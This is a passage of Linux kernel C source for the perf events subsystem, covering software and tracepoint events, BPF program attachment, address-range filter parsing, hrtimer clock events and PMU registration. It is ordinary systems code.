RCU_INIT_POINTER(swhash->swevent_hlist, NULL);
kfree_rcu(hlist, rcu_head);
}
static void swevent_hlist_put_cpu(int cpu)
{
struct swevent_htable *swhash = &per_cpu(swevent_htable, cpu);
mutex_lock(&swhash->hlist_mutex);
if (!--swhash->hlist_refcount)
swevent_hlist_release(swhash);
mutex_unlock(&swhash->hlist_mutex);
}
static void swevent_hlist_put(void)
{
int cpu;
for_each_possible_cpu(cpu)
swevent_hlist_put_cpu(cpu);
}
static int swevent_hlist_get_cpu(int cpu)
{
struct swevent_htable *swhash = &per_cpu(swevent_htable, cpu);
int err = 0;
mutex_lock(&swhash->hlist_mutex);
if (!swevent_hlist_deref(swhash) && cpu_online(cpu)) {
struct swevent_hlist *hlist;
hlist = kzalloc(sizeof(*hlist), GFP_KERNEL);
if (!hlist) {
err = -ENOMEM;
goto exit;
}
rcu_assign_pointer(swhash->swevent_hlist, hlist);
}
swhash->hlist_refcount++;
exit:
mutex_unlock(&swhash->hlist_mutex);
return err;
}
static int swevent_hlist_get(void)
{
int err, cpu, failed_cpu;
get_online_cpus();
for_each_possible_cpu(cpu) {
err = swevent_hlist_get_cpu(cpu);
if (err) {
failed_cpu = cpu;
goto fail;
}
}
put_online_cpus();
return 0;
fail:
for_each_possible_cpu(cpu) {
if (cpu == failed_cpu)
break;
swevent_hlist_put_cpu(cpu);
}
put_online_cpus();
return err;
}
struct static_key perf_swevent_enabled[PERF_COUNT_SW_MAX];
static void sw_perf_event_destroy(struct perf_event *event)
{
u64 event_id = event->attr.config;
WARN_ON(event->parent);
static_key_slow_dec(&perf_swevent_enabled[event_id]);
swevent_hlist_put();
}
static int perf_swevent_init(struct perf_event *event)
{
u64 event_id = event->attr.config;
if (event->attr.type != PERF_TYPE_SOFTWARE)
return -ENOENT;
/*
* no branch sampling for software events
*/
if (has_branch_stack(event))
return -EOPNOTSUPP;
switch (event_id) {
case PERF_COUNT_SW_CPU_CLOCK:
case PERF_COUNT_SW_TASK_CLOCK:
return -ENOENT;
default:
break;
}
if (event_id >= PERF_COUNT_SW_MAX)
return -ENOENT;
if (!event->parent) {
int err;
err = swevent_hlist_get();
if (err)
return err;
static_key_slow_inc(&perf_swevent_enabled[event_id]);
event->destroy = sw_perf_event_destroy;
}
return 0;
}
static struct pmu perf_swevent = {
.task_ctx_nr = perf_sw_context,
.capabilities = PERF_PMU_CAP_NO_NMI,
.event_init = perf_swevent_init,
.add = perf_swevent_add,
.del = perf_swevent_del,
.start = perf_swevent_start,
.stop = perf_swevent_stop,
.read = perf_swevent_read,
};
#ifdef CONFIG_EVENT_TRACING
static int perf_tp_filter_match(struct perf_event *event,
struct perf_sample_data *data)
{
void *record = data->raw->frag.data;
/* only top level events have filters set */
if (event->parent)
event = event->parent;
if (likely(!event->filter) || filter_match_preds(event->filter, record))
return 1;
return 0;
}
static int perf_tp_event_match(struct perf_event *event,
struct perf_sample_data *data,
struct pt_regs *regs)
{
if (event->hw.state & PERF_HES_STOPPED)
return 0;
/*
* All tracepoints are from kernel-space.
*/
if (event->attr.exclude_kernel)
return 0;
if (!perf_tp_filter_match(event, data))
return 0;
return 1;
}
void perf_trace_run_bpf_submit(void *raw_data, int size, int rctx,
struct trace_event_call *call, u64 count,
struct pt_regs *regs, struct hlist_head *head,
struct task_struct *task)
{
struct bpf_prog *prog = call->prog;
if (prog) {
*(struct pt_regs **)raw_data = regs;
if (!trace_call_bpf(prog, raw_data) || hlist_empty(head)) {
perf_swevent_put_recursion_context(rctx);
return;
}
}
perf_tp_event(call->event.type, count, raw_data, size, regs, head,
rctx, task);
}
EXPORT_SYMBOL_GPL(perf_trace_run_bpf_submit);
void perf_tp_event(u16 event_type, u64 count, void *record, int entry_size,
struct pt_regs *regs, struct hlist_head *head, int rctx,
struct task_struct *task)
{
struct perf_sample_data data;
struct perf_event *event;
struct perf_raw_record raw = {
.frag = {
.size = entry_size,
.data = record,
},
};
perf_sample_data_init(&data, 0, 0);
data.raw = &raw;
perf_trace_buf_update(record, event_type);
hlist_for_each_entry_rcu(event, head, hlist_entry) {
if (perf_tp_event_match(event, &data, regs))
perf_swevent_event(event, count, &data, regs);
}
/*
* If we got specified a target task, also iterate its context and
* deliver this event there too.
*/
if (task && task != current) {
struct perf_event_context *ctx;
struct trace_entry *entry = record;
rcu_read_lock();
ctx = rcu_dereference(task->perf_event_ctxp[perf_sw_context]);
if (!ctx)
goto unlock;
list_for_each_entry_rcu(event, &ctx->event_list, event_entry) {
if (event->attr.type != PERF_TYPE_TRACEPOINT)
continue;
if (event->attr.config != entry->type)
continue;
if (perf_tp_event_match(event, &data, regs))
perf_swevent_event(event, count, &data, regs);
}
unlock:
rcu_read_unlock();
}
perf_swevent_put_recursion_context(rctx);
}
EXPORT_SYMBOL_GPL(perf_tp_event);
static void tp_perf_event_destroy(struct perf_event *event)
{
perf_trace_destroy(event);
}
static int perf_tp_event_init(struct perf_event *event)
{
int err;
if (event->attr.type != PERF_TYPE_TRACEPOINT)
return -ENOENT;
/*
* no branch sampling for tracepoint events
*/
if (has_branch_stack(event))
return -EOPNOTSUPP;
err = perf_trace_init(event);
if (err)
return err;
event->destroy = tp_perf_event_destroy;
return 0;
}
static struct pmu perf_tracepoint = {
.task_ctx_nr = perf_sw_context,
.event_init = perf_tp_event_init,
.add = perf_trace_add,
.del = perf_trace_del,
.start = perf_swevent_start,
.stop = perf_swevent_stop,
.read = perf_swevent_read,
};
static inline void perf_tp_register(void)
{
perf_pmu_register(&perf_tracepoint, "tracepoint", PERF_TYPE_TRACEPOINT);
}
static void perf_event_free_filter(struct perf_event *event)
{
ftrace_profile_free_filter(event);
}
#ifdef CONFIG_BPF_SYSCALL
static void bpf_overflow_handler(struct perf_event *event,
struct perf_sample_data *data,
struct pt_regs *regs)
{
struct bpf_perf_event_data_kern ctx = {
.data = data,
.regs = regs,
};
int ret = 0;
preempt_disable();
if (unlikely(__this_cpu_inc_return(bpf_prog_active) != 1))
goto out;
rcu_read_lock();
ret = BPF_PROG_RUN(event->prog, &ctx);
rcu_read_unlock();
out:
__this_cpu_dec(bpf_prog_active);
preempt_enable();
if (!ret)
return;
event->orig_overflow_handler(event, data, regs);
}
static int perf_event_set_bpf_handler(struct perf_event *event, u32 prog_fd)
{
struct bpf_prog *prog;
if (event->overflow_handler_context)
/* hw breakpoint or kernel counter */
return -EINVAL;
if (event->prog)
return -EEXIST;
prog = bpf_prog_get_type(prog_fd, BPF_PROG_TYPE_PERF_EVENT);
if (IS_ERR(prog))
return PTR_ERR(prog);
event->prog = prog;
event->orig_overflow_handler = READ_ONCE(event->overflow_handler);
WRITE_ONCE(event->overflow_handler, bpf_overflow_handler);
return 0;
}
static void perf_event_free_bpf_handler(struct perf_event *event)
{
struct bpf_prog *prog = event->prog;
if (!prog)
return;
WRITE_ONCE(event->overflow_handler, event->orig_overflow_handler);
event->prog = NULL;
bpf_prog_put(prog);
}
#else
static int perf_event_set_bpf_handler(struct perf_event *event, u32 prog_fd)
{
return -EOPNOTSUPP;
}
static void perf_event_free_bpf_handler(struct perf_event *event)
{
}
#endif
static int perf_event_set_bpf_prog(struct perf_event *event, u32 prog_fd)
{
bool is_kprobe, is_tracepoint;
struct bpf_prog *prog;
if (event->attr.type == PERF_TYPE_HARDWARE ||
event->attr.type == PERF_TYPE_SOFTWARE)
return perf_event_set_bpf_handler(event, prog_fd);
if (event->attr.type != PERF_TYPE_TRACEPOINT)
return -EINVAL;
if (event->tp_event->prog)
return -EEXIST;
is_kprobe = event->tp_event->flags & TRACE_EVENT_FL_UKPROBE;
is_tracepoint = event->tp_event->flags & TRACE_EVENT_FL_TRACEPOINT;
if (!is_kprobe && !is_tracepoint)
/* bpf programs can only be attached to u/kprobe or tracepoint */
return -EINVAL;
prog = bpf_prog_get(prog_fd);
if (IS_ERR(prog))
return PTR_ERR(prog);
if ((is_kprobe && prog->type != BPF_PROG_TYPE_KPROBE) ||
(is_tracepoint && prog->type != BPF_PROG_TYPE_TRACEPOINT)) {
/* valid fd, but invalid bpf program type */
bpf_prog_put(prog);
return -EINVAL;
}
if (is_tracepoint) {
int off = trace_event_get_offsets(event->tp_event);
if (prog->aux->max_ctx_offset > off) {
bpf_prog_put(prog);
return -EACCES;
}
}
event->tp_event->prog = prog;
return 0;
}
static void perf_event_free_bpf_prog(struct perf_event *event)
{
struct bpf_prog *prog;
perf_event_free_bpf_handler(event);
if (!event->tp_event)
return;
prog = event->tp_event->prog;
if (prog) {
event->tp_event->prog = NULL;
bpf_prog_put(prog);
}
}
#else
static inline void perf_tp_register(void)
{
}
static void perf_event_free_filter(struct perf_event *event)
{
}
static int perf_event_set_bpf_prog(struct perf_event *event, u32 prog_fd)
{
return -ENOENT;
}
static void perf_event_free_bpf_prog(struct perf_event *event)
{
}
#endif /* CONFIG_EVENT_TRACING */
#ifdef CONFIG_HAVE_HW_BREAKPOINT
void perf_bp_event(struct perf_event *bp, void *data)
{
struct perf_sample_data sample;
struct pt_regs *regs = data;
perf_sample_data_init(&sample, bp->attr.bp_addr, 0);
if (!bp->hw.state && !perf_exclude_event(bp, regs))
perf_swevent_event(bp, 1, &sample, regs);
}
#endif
/*
* Allocate a new address filter
*/
static struct perf_addr_filter *
perf_addr_filter_new(struct perf_event *event, struct list_head *filters)
{
int node = cpu_to_node(event->cpu == -1 ? 0 : event->cpu);
struct perf_addr_filter *filter;
filter = kzalloc_node(sizeof(*filter), GFP_KERNEL, node);
if (!filter)
return NULL;
INIT_LIST_HEAD(&filter->entry);
list_add_tail(&filter->entry, filters);
return filter;
}
static void free_filters_list(struct list_head *filters)
{
struct perf_addr_filter *filter, *iter;
list_for_each_entry_safe(filter, iter, filters, entry) {
if (filter->inode)
iput(filter->inode);
list_del(&filter->entry);
kfree(filter);
}
}
/*
* Free existing address filters and optionally install new ones
*/
static void perf_addr_filters_splice(struct perf_event *event,
struct list_head *head)
{
unsigned long flags;
LIST_HEAD(list);
if (!has_addr_filter(event))
return;
/* don't bother with children, they don't have their own filters */
if (event->parent)
return;
raw_spin_lock_irqsave(&event->addr_filters.lock, flags);
list_splice_init(&event->addr_filters.list, &list);
if (head)
list_splice(head, &event->addr_filters.list);
raw_spin_unlock_irqrestore(&event->addr_filters.lock, flags);
free_filters_list(&list);
}
/*
* Scan through mm's vmas and see if one of them matches the
* @filter; if so, adjust filter's address range.
* Called with mm::mmap_sem down for reading.
*/
static unsigned long perf_addr_filter_apply(struct perf_addr_filter *filter,
struct mm_struct *mm)
{
struct vm_area_struct *vma;
for (vma = mm->mmap; vma; vma = vma->vm_next) {
struct file *file = vma->vm_file;
unsigned long off = vma->vm_pgoff << PAGE_SHIFT;
unsigned long vma_size = vma->vm_end - vma->vm_start;
if (!file)
continue;
if (!perf_addr_filter_match(filter, file, off, vma_size))
continue;
return vma->vm_start;
}
return 0;
}
/*
* Update event's address range filters based on the
* task's existing mappings, if any.
*/
static void perf_event_addr_filters_apply(struct perf_event *event)
{
struct perf_addr_filters_head *ifh = perf_event_addr_filters(event);
struct task_struct *task = READ_ONCE(event->ctx->task);
struct perf_addr_filter *filter;
struct mm_struct *mm = NULL;
unsigned int count = 0;
unsigned long flags;
/*
* We may observe TASK_TOMBSTONE, which means that the event tear-down
* will stop on the parent's child_mutex that our caller is also holding
*/
if (task == TASK_TOMBSTONE)
return;
if (!ifh->nr_file_filters)
return;
mm = get_task_mm(event->ctx->task);
if (!mm)
goto restart;
down_read(&mm->mmap_sem);
raw_spin_lock_irqsave(&ifh->lock, flags);
list_for_each_entry(filter, &ifh->list, entry) {
event->addr_filters_offs[count] = 0;
/*
* Adjust base offset if the filter is associated to a binary
* that needs to be mapped:
*/
if (filter->inode)
event->addr_filters_offs[count] =
perf_addr_filter_apply(filter, mm);
count++;
}
event->addr_filters_gen++;
raw_spin_unlock_irqrestore(&ifh->lock, flags);
up_read(&mm->mmap_sem);
mmput(mm);
restart:
perf_event_stop(event, 1);
}
/*
* Address range filtering: limiting the data to certain
* instruction address ranges. Filters are ioctl()ed to us from
* userspace as ascii strings.
*
* Filter string format:
*
* ACTION RANGE_SPEC
* where ACTION is one of the
* * "filter": limit the trace to this region
* * "start": start tracing from this address
* * "stop": stop tracing at this address/region;
* RANGE_SPEC is
* * for kernel addresses: <start address>[/<size>]
* * for object files: <start address>[/<size>]@</path/to/object/file>
*
* if <size> is not specified, the range is treated as a single address.
*/
enum {
IF_ACT_NONE = -1,
IF_ACT_FILTER,
IF_ACT_START,
IF_ACT_STOP,
IF_SRC_FILE,
IF_SRC_KERNEL,
IF_SRC_FILEADDR,
IF_SRC_KERNELADDR,
};
enum {
IF_STATE_ACTION = 0,
IF_STATE_SOURCE,
IF_STATE_END,
};
static const match_table_t if_tokens = {
{ IF_ACT_FILTER, "filter" },
{ IF_ACT_START, "start" },
{ IF_ACT_STOP, "stop" },
{ IF_SRC_FILE, "%u/%u@%s" },
{ IF_SRC_KERNEL, "%u/%u" },
{ IF_SRC_FILEADDR, "%u@%s" },
{ IF_SRC_KERNELADDR, "%u" },
{ IF_ACT_NONE, NULL },
};
/*
* Address filter string parser
*/
static int
perf_event_parse_addr_filter(struct perf_event *event, char *fstr,
struct list_head *filters)
{
struct perf_addr_filter *filter = NULL;
char *start, *orig, *filename = NULL;
struct path path;
substring_t args[MAX_OPT_ARGS];
int state = IF_STATE_ACTION, token;
unsigned int kernel = 0;
int ret = -EINVAL;
orig = fstr = kstrdup(fstr, GFP_KERNEL);
if (!fstr)
return -ENOMEM;
while ((start = strsep(&fstr, " ,\n")) != NULL) {
ret = -EINVAL;
if (!*start)
continue;
/* filter definition begins */
if (state == IF_STATE_ACTION) {
filter = perf_addr_filter_new(event, filters);
if (!filter)
goto fail;
}
token = match_token(start, if_tokens, args);
switch (token) {
case IF_ACT_FILTER:
case IF_ACT_START:
filter->filter = 1;
case IF_ACT_STOP:
if (state != IF_STATE_ACTION)
goto fail;
state = IF_STATE_SOURCE;
break;
case IF_SRC_KERNELADDR:
case IF_SRC_KERNEL:
kernel = 1;
case IF_SRC_FILEADDR:
case IF_SRC_FILE:
if (state != IF_STATE_SOURCE)
goto fail;
if (token == IF_SRC_FILE || token == IF_SRC_KERNEL)
filter->range = 1;
*args[0].to = 0;
ret = kstrtoul(args[0].from, 0, &filter->offset);
if (ret)
goto fail;
if (filter->range) {
*args[1].to = 0;
ret = kstrtoul(args[1].from, 0, &filter->size);
if (ret)
goto fail;
}
if (token == IF_SRC_FILE || token == IF_SRC_FILEADDR) {
int fpos = filter->range ? 2 : 1;
filename = match_strdup(&args[fpos]);
if (!filename) {
ret = -ENOMEM;
goto fail;
}
}
state = IF_STATE_END;
break;
default:
goto fail;
}
/*
* Filter definition is fully parsed, validate and install it.
* Make sure that it doesn't contradict itself or the event's
* attribute.
*/
if (state == IF_STATE_END) {
ret = -EINVAL;
if (kernel && event->attr.exclude_kernel)
goto fail;
if (!kernel) {
if (!filename)
goto fail;
/*
* For now, we only support file-based filters
* in per-task events; doing so for CPU-wide
* events requires additional context switching
* trickery, since same object code will be
* mapped at different virtual addresses in
* different processes.
*/
ret = -EOPNOTSUPP;
if (!event->ctx->task)
goto fail_free_name;
/* look up the path and grab its inode */
ret = kern_path(filename, LOOKUP_FOLLOW, &path);
if (ret)
goto fail_free_name;
filter->inode = igrab(d_inode(path.dentry));
path_put(&path);
kfree(filename);
filename = NULL;
ret = -EINVAL;
if (!filter->inode ||
!S_ISREG(filter->inode->i_mode))
/* free_filters_list() will iput() */
goto fail;
event->addr_filters.nr_file_filters++;
}
/* ready to consume more filters */
state = IF_STATE_ACTION;
filter = NULL;
}
}
if (state != IF_STATE_ACTION)
goto fail;
kfree(orig);
return 0;
fail_free_name:
kfree(filename);
fail:
free_filters_list(filters);
kfree(orig);
return ret;
}
static int
perf_event_set_addr_filter(struct perf_event *event, char *filter_str)
{
LIST_HEAD(filters);
int ret;
/*
* Since this is called in perf_ioctl() path, we're already holding
* ctx::mutex.
*/
lockdep_assert_held(&event->ctx->mutex);
if (WARN_ON_ONCE(event->parent))
return -EINVAL;
ret = perf_event_parse_addr_filter(event, filter_str, &filters);
if (ret)
goto fail_clear_files;
ret = event->pmu->addr_filters_validate(&filters);
if (ret)
goto fail_free_filters;
/* remove existing filters, if any */
perf_addr_filters_splice(event, &filters);
/* install new filters */
perf_event_for_each_child(event, perf_event_addr_filters_apply);
return ret;
fail_free_filters:
free_filters_list(&filters);
fail_clear_files:
event->addr_filters.nr_file_filters = 0;
return ret;
}
static int perf_event_set_filter(struct perf_event *event, void __user *arg)
{
char *filter_str;
int ret = -EINVAL;
if ((event->attr.type != PERF_TYPE_TRACEPOINT ||
!IS_ENABLED(CONFIG_EVENT_TRACING)) &&
!has_addr_filter(event))
return -EINVAL;
filter_str = strndup_user(arg, PAGE_SIZE);
if (IS_ERR(filter_str))
return PTR_ERR(filter_str);
if (IS_ENABLED(CONFIG_EVENT_TRACING) &&
event->attr.type == PERF_TYPE_TRACEPOINT)
ret = ftrace_profile_set_filter(event, event->attr.config,
filter_str);
else if (has_addr_filter(event))
ret = perf_event_set_addr_filter(event, filter_str);
kfree(filter_str);
return ret;
}
/*
* hrtimer based swevent callback
*/
static enum hrtimer_restart perf_swevent_hrtimer(struct hrtimer *hrtimer)
{
enum hrtimer_restart ret = HRTIMER_RESTART;
struct perf_sample_data data;
struct pt_regs *regs;
struct perf_event *event;
u64 period;
event = container_of(hrtimer, struct perf_event, hw.hrtimer);
if (event->state != PERF_EVENT_STATE_ACTIVE)
return HRTIMER_NORESTART;
event->pmu->read(event);
perf_sample_data_init(&data, 0, event->hw.last_period);
regs = get_irq_regs();
if (regs && !perf_exclude_event(event, regs)) {
if (!(event->attr.exclude_idle && is_idle_task(current)))
if (__perf_event_overflow(event, 1, &data, regs))
ret = HRTIMER_NORESTART;
}
period = max_t(u64, 10000, event->hw.sample_period);
hrtimer_forward_now(hrtimer, ns_to_ktime(period));
return ret;
}
static void perf_swevent_start_hrtimer(struct perf_event *event)
{
struct hw_perf_event *hwc = &event->hw;
s64 period;
if (!is_sampling_event(event))
return;
period = local64_read(&hwc->period_left);
if (period) {
if (period < 0)
period = 10000;
local64_set(&hwc->period_left, 0);
} else {
period = max_t(u64, 10000, hwc->sample_period);
}
hrtimer_start(&hwc->hrtimer, ns_to_ktime(period),
HRTIMER_MODE_REL_PINNED);
}
static void perf_swevent_cancel_hrtimer(struct perf_event *event)
{
struct hw_perf_event *hwc = &event->hw;
if (is_sampling_event(event)) {
ktime_t remaining = hrtimer_get_remaining(&hwc->hrtimer);
local64_set(&hwc->period_left, ktime_to_ns(remaining));
hrtimer_cancel(&hwc->hrtimer);
}
}
static void perf_swevent_init_hrtimer(struct perf_event *event)
{
struct hw_perf_event *hwc = &event->hw;
if (!is_sampling_event(event))
return;
hrtimer_init(&hwc->hrtimer, CLOCK_MONOTONIC, HRTIMER_MODE_REL);
hwc->hrtimer.function = perf_swevent_hrtimer;
/*
* Since hrtimers have a fixed rate, we can do a static freq->period
* mapping and avoid the whole period adjust feedback stuff.
*/
if (event->attr.freq) {
long freq = event->attr.sample_freq;
event->attr.sample_period = NSEC_PER_SEC / freq;
hwc->sample_period = event->attr.sample_period;
local64_set(&hwc->period_left, hwc->sample_period);
hwc->last_period = hwc->sample_period;
event->attr.freq = 0;
}
}
/*
* Software event: cpu wall time clock
*/
static void cpu_clock_event_update(struct perf_event *event)
{
s64 prev;
u64 now;
now = local_clock();
prev = local64_xchg(&event->hw.prev_count, now);
local64_add(now - prev, &event->count);
}
static void cpu_clock_event_start(struct perf_event *event, int flags)
{
local64_set(&event->hw.prev_count, local_clock());
perf_swevent_start_hrtimer(event);
}
static void cpu_clock_event_stop(struct perf_event *event, int flags)
{
perf_swevent_cancel_hrtimer(event);
cpu_clock_event_update(event);
}
static int cpu_clock_event_add(struct perf_event *event, int flags)
{
if (flags & PERF_EF_START)
cpu_clock_event_start(event, flags);
perf_event_update_userpage(event);
return 0;
}
static void cpu_clock_event_del(struct perf_event *event, int flags)
{
cpu_clock_event_stop(event, flags);
}
static void cpu_clock_event_read(struct perf_event *event)
{
cpu_clock_event_update(event);
}
static int cpu_clock_event_init(struct perf_event *event)
{
if (event->attr.type != PERF_TYPE_SOFTWARE)
return -ENOENT;
if (event->attr.config != PERF_COUNT_SW_CPU_CLOCK)
return -ENOENT;
/*
* no branch sampling for software events
*/
if (has_branch_stack(event))
return -EOPNOTSUPP;
perf_swevent_init_hrtimer(event);
return 0;
}
static struct pmu perf_cpu_clock = {
.task_ctx_nr = perf_sw_context,
.capabilities = PERF_PMU_CAP_NO_NMI,
.event_init = cpu_clock_event_init,
.add = cpu_clock_event_add,
.del = cpu_clock_event_del,
.start = cpu_clock_event_start,
.stop = cpu_clock_event_stop,
.read = cpu_clock_event_read,
};
/*
* Software event: task time clock
*/
static void task_clock_event_update(struct perf_event *event, u64 now)
{
u64 prev;
s64 delta;
prev = local64_xchg(&event->hw.prev_count, now);
delta = now - prev;
local64_add(delta, &event->count);
}
static void task_clock_event_start(struct perf_event *event, int flags)
{
local64_set(&event->hw.prev_count, event->ctx->time);
perf_swevent_start_hrtimer(event);
}
static void task_clock_event_stop(struct perf_event *event, int flags)
{
perf_swevent_cancel_hrtimer(event);
task_clock_event_update(event, event->ctx->time);
}
static int task_clock_event_add(struct perf_event *event, int flags)
{
if (flags & PERF_EF_START)
task_clock_event_start(event, flags);
perf_event_update_userpage(event);
return 0;
}
static void task_clock_event_del(struct perf_event *event, int flags)
{
task_clock_event_stop(event, PERF_EF_UPDATE);
}
static void task_clock_event_read(struct perf_event *event)
{
u64 now = perf_clock();
u64 delta = now - event->ctx->timestamp;
u64 time = event->ctx->time + delta;
task_clock_event_update(event, time);
}
static int task_clock_event_init(struct perf_event *event)
{
if (event->attr.type != PERF_TYPE_SOFTWARE)
return -ENOENT;
if (event->attr.config != PERF_COUNT_SW_TASK_CLOCK)
return -ENOENT;
/*
* no branch sampling for software events
*/
if (has_branch_stack(event))
return -EOPNOTSUPP;
perf_swevent_init_hrtimer(event);
return 0;
}
static struct pmu perf_task_clock = {
.task_ctx_nr = perf_sw_context,
.capabilities = PERF_PMU_CAP_NO_NMI,
.event_init = task_clock_event_init,
.add = task_clock_event_add,
.del = task_clock_event_del,
.start = task_clock_event_start,
.stop = task_clock_event_stop,
.read = task_clock_event_read,
};
static void perf_pmu_nop_void(struct pmu *pmu)
{
}
static void perf_pmu_nop_txn(struct pmu *pmu, unsigned int flags)
{
}
static int perf_pmu_nop_int(struct pmu *pmu)
{
return 0;
}
static DEFINE_PER_CPU(unsigned int, nop_txn_flags);
static void perf_pmu_start_txn(struct pmu *pmu, unsigned int flags)
{
__this_cpu_write(nop_txn_flags, flags);
if (flags & ~PERF_PMU_TXN_ADD)
return;
perf_pmu_disable(pmu);
}
static int perf_pmu_commit_txn(struct pmu *pmu)
{
unsigned int flags = __this_cpu_read(nop_txn_flags);
__this_cpu_write(nop_txn_flags, 0);
if (flags & ~PERF_PMU_TXN_ADD)
return 0;
perf_pmu_enable(pmu);
return 0;
}
static void perf_pmu_cancel_txn(struct pmu *pmu)
{
unsigned int flags = __this_cpu_read(nop_txn_flags);
__this_cpu_write(nop_txn_flags, 0);
if (flags & ~PERF_PMU_TXN_ADD)
return;
perf_pmu_enable(pmu);
}
static int perf_event_idx_default(struct perf_event *event)
{
return 0;
}
/*
* Ensures all contexts with the same task_ctx_nr have the same
* pmu_cpu_context too.
*/
static struct perf_cpu_context __percpu *find_pmu_context(int ctxn)
{
struct pmu *pmu;
if (ctxn < 0)
return NULL;
list_for_each_entry(pmu, &pmus, entry) {
if (pmu->task_ctx_nr == ctxn)
return pmu->pmu_cpu_context;
}
return NULL;
}
static void free_pmu_context(struct pmu *pmu)
{
mutex_lock(&pmus_lock);
free_percpu(pmu->pmu_cpu_context);
mutex_unlock(&pmus_lock);
}
/*
* Let userspace know that this PMU supports address range filtering:
*/
static ssize_t nr_addr_filters_show(struct device *dev,
struct device_attribute *attr,
char *page)
{
struct pmu *pmu = dev_get_drvdata(dev);
return snprintf(page, PAGE_SIZE - 1, "%d\n", pmu->nr_addr_filters);
}
DEVICE_ATTR_RO(nr_addr_filters);
static struct idr pmu_idr;
static ssize_t
type_show(struct device *dev, struct device_attribute *attr, char *page)
{
struct pmu *pmu = dev_get_drvdata(dev);
return snprintf(page, PAGE_SIZE-1, "%d\n", pmu->type);
}
static DEVICE_ATTR_RO(type);
static ssize_t
perf_event_mux_interval_ms_show(struct device *dev,
struct device_attribute *attr,
char *page)
{
struct pmu *pmu = dev_get_drvdata(dev);
return snprintf(page, PAGE_SIZE-1, "%d\n", pmu->hrtimer_interval_ms);
}
static DEFINE_MUTEX(mux_interval_mutex);
static ssize_t
perf_event_mux_interval_ms_store(struct device *dev,
struct device_attribute *attr,
const char *buf, size_t count)
{
struct pmu *pmu = dev_get_drvdata(dev);
int timer, cpu, ret;
ret = kstrtoint(buf, 0, &timer);
if (ret)
return ret;
if (timer < 1)
return -EINVAL;
/* same value, noting to do */
if (timer == pmu->hrtimer_interval_ms)
return count;
mutex_lock(&mux_interval_mutex);
pmu->hrtimer_interval_ms = timer;
/* update all cpuctx for this PMU */
get_online_cpus();
for_each_online_cpu(cpu) {
struct perf_cpu_context *cpuctx;
cpuctx = per_cpu_ptr(pmu->pmu_cpu_context, cpu);
cpuctx->hrtimer_interval = ns_to_ktime(NSEC_PER_MSEC * timer);
cpu_function_call(cpu,
(remote_function_f)perf_mux_hrtimer_restart, cpuctx);
}
put_online_cpus();
mutex_unlock(&mux_interval_mutex);
return count;
}
static DEVICE_ATTR_RW(perf_event_mux_interval_ms);
static struct attribute *pmu_dev_attrs[] = {
&dev_attr_type.attr,
&dev_attr_perf_event_mux_interval_ms.attr,
NULL,
};
ATTRIBUTE_GROUPS(pmu_dev);
static int pmu_bus_running;
static struct bus_type pmu_bus = {
.name = "event_source",
.dev_groups = pmu_dev_groups,
};
static void pmu_dev_release(struct device *dev)
{
kfree(dev);
}
static int pmu_dev_alloc(struct pmu *pmu)
{
int ret = -ENOMEM;
pmu->dev = kzalloc(sizeof(struct device), GFP_KERNEL);
if (!pmu->dev)
goto out;
pmu->dev->groups = pmu->attr_groups;
device_initialize(pmu->dev);
ret = dev_set_name(pmu->dev, "%s", pmu->name);
if (ret)
goto free_dev;
dev_set_drvdata(pmu->dev, pmu);
pmu->dev->bus = &pmu_bus;
pmu->dev->release = pmu_dev_release;
ret = device_add(pmu->dev);
if (ret)
goto free_dev;
/* For PMUs with address filters, throw in an extra attribute: */
if (pmu->nr_addr_filters)
ret = device_create_file(pmu->dev, &dev_attr_nr_addr_filters);
if (ret)
goto del_dev;
out:
return ret;
del_dev:
device_del(pmu->dev);
free_dev:
put_device(pmu->dev);
goto out;
}
static struct lock_class_key cpuctx_mutex;
static struct lock_class_key cpuctx_lock;
int perf_pmu_register(struct pmu *pmu, const char *name, int type)
{
int cpu, ret;
mutex_lock(&pmus_lock);
ret = -ENOMEM;
pmu->pmu_disable_count = alloc_percpu(int);
if (!pmu->pmu_disable_count)
goto unlock;
pmu->type = -1;
if (!name)
goto skip_type;
pmu->name = name;
if (type < 0) {
type = idr_alloc(&pmu_idr, pmu, PERF_TYPE_MAX, 0, GFP_KERNEL);
if (type < 0) {
ret = type;
goto free_pdc;
}
}
pmu->type = type;
if (pmu_bus_running) {
ret = pmu_dev_alloc(pmu);
if (ret)
goto free_idr;
}
skip_type:
if (pmu->task_ctx_nr == perf_hw_context) {
static int hw_context_taken = 0;
/*
* Other than systems with heterogeneous CPUs, it never makes
* sense for two PMUs to share perf_hw_context. PMUs which are
* uncore must use perf_invalid_context.
*/
if (WARN_ON_ONCE(hw_context_taken &&
!(pmu->capabilities & PERF_PMU_CAP_HETEROGENEOUS_CPUS)))
pmu->task_ctx_nr = perf_invalid_context;
hw_context_taken = 1;
}
pmu->pmu_cpu_context = find_pmu_context(pmu->task_ctx_nr);
if (pmu->pmu_cpu_context)
goto got_cpu_context;
ret = -ENOMEM;
pmu->pmu_cpu_context = alloc_percpu(struct perf_cpu_context);
if (!pmu->pmu_cpu_context)
goto free_dev;
for_each_possible_cpu(cpu) {
struct perf_cpu_context *cpuctx;
cpuctx = per_cpu_ptr(pmu->pmu_cpu_context, cpu);
__perf_event_init_context(&cpuctx->ctx);
lockdep_set_class(&cpuctx->ctx.mutex, &cpuctx_mutex);
lockdep_set_class(&cpuctx->ctx.lock, &cpuctx_lock);
cpuctx->ctx.pmu = pmu;
__perf_mux_hrtimer_init(cpuctx, cpu);
}
got_cpu_context:
if (!pmu->start_txn) {
if (pmu->pmu_enable) {
/*
* If we have pmu_enable/pmu_disable calls, install
* transaction stubs that use that to try and batch
* hardware accesses.
*/
pmu->start_txn = perf_pmu_start_txn;
pmu->commit_txn = perf_pmu_commit_txn;
pmu->cancel_txn = perf_pmu_cancel_txn;
} else {
pmu->start_txn = perf_pmu_nop_txn;
pmu->commit_txn = perf_pmu_nop_int;
pmu->cancel_txn = perf_pmu_nop_void;
}
}
if (!pmu->pmu_enable) {
pmu->pmu_enable = perf_pmu_nop_void;
pmu->pmu_disable = perf_pmu_nop_void;
}
if (!pmu->event_idx)
pmu->event_idx = perf_event_idx_default;
list_add_rcu(&pmu->entry, &pmus);
atomic_set(&pmu->exclusive_cnt, 0);
ret = 0;
unlock:
mutex_unlock(&pmus_lock);
return ret;
free_dev:
device_del(pmu->dev);
put_device(pmu->dev);
free_idr:
if (pmu->type >= PERF_TYPE_MAX)
idr_remove(&pmu_idr, pmu->type);
free_pdc:
free_percpu(pmu->pmu_disable_count);
goto unlock;
}
EXPORT_SYMBOL_GPL(perf_pmu_register);
void perf_pmu_unregister(struct pmu *pmu)
{
int remove_device;
mutex_lock(&pmus_lock);
